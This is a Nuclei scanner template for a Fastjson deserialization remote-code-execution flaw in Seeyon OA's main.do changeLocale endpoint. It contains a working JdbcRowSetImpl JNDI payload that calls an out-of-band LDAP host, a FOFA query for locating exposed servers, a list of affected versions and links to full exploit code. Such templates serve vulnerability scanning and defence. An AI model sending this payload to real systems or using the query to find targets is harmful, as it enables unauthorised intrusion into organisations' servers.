id: seeyon-main-fastjson-rce-0

info:
  name: 致远 OA main - fastjson rce
  author: SleepingBag945,leadlife
  severity: critical
  description: Seeyon OA Fastjson is vulnerable to RCE.
  reference:
    - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
    - https://github.com/hktalent/scan4all/blob/main/pocs_go/seeyon/SeeyonFastjson.go
  metadata:
    verified: true
    fofa-query: app="致远互联-OA"
    version: |
      致远 OA V7.1、V7.1SP1
      致远 OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3
      致远 OA V6.1、V6.1SP1、V6.1SP2
      致远 V6.0及V6.0SP1
      致远 V5.6及V5.6SP1
    tips: to use exp rce https://github.com/DawnFlame/POChouse/blob/f5b80965c38eb4f42133f4f458650bae5cc75b98/%5B%2B%5D%20%E5%8D%8F%E5%90%8C%E5%8A%9E%E5%85%ACOA%E7%B3%BB%E7%BB%9F/Seeyon-%E8%87%B4%E8%BF%9COA/A8-FastJson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96RCE/README.md
  tags: seeyon,oa,rce,fastjson,oast,oob

http:
  - raw:
      - |
        POST /seeyon/main.do?method=changeLocale HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _json_params={"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "com.alibaba.fastjson.JSONException"
# digest: 4a0a00473045022100eed8c1874aeee1da8cb9ef77d7a2710d8623731e9e613d5915c89059415a03da022063263a8ae8cb37665863634dff3a097cfed4b67947597b21b34ac0b85cd18d57:922c64590222798bb761d5b6d8e72950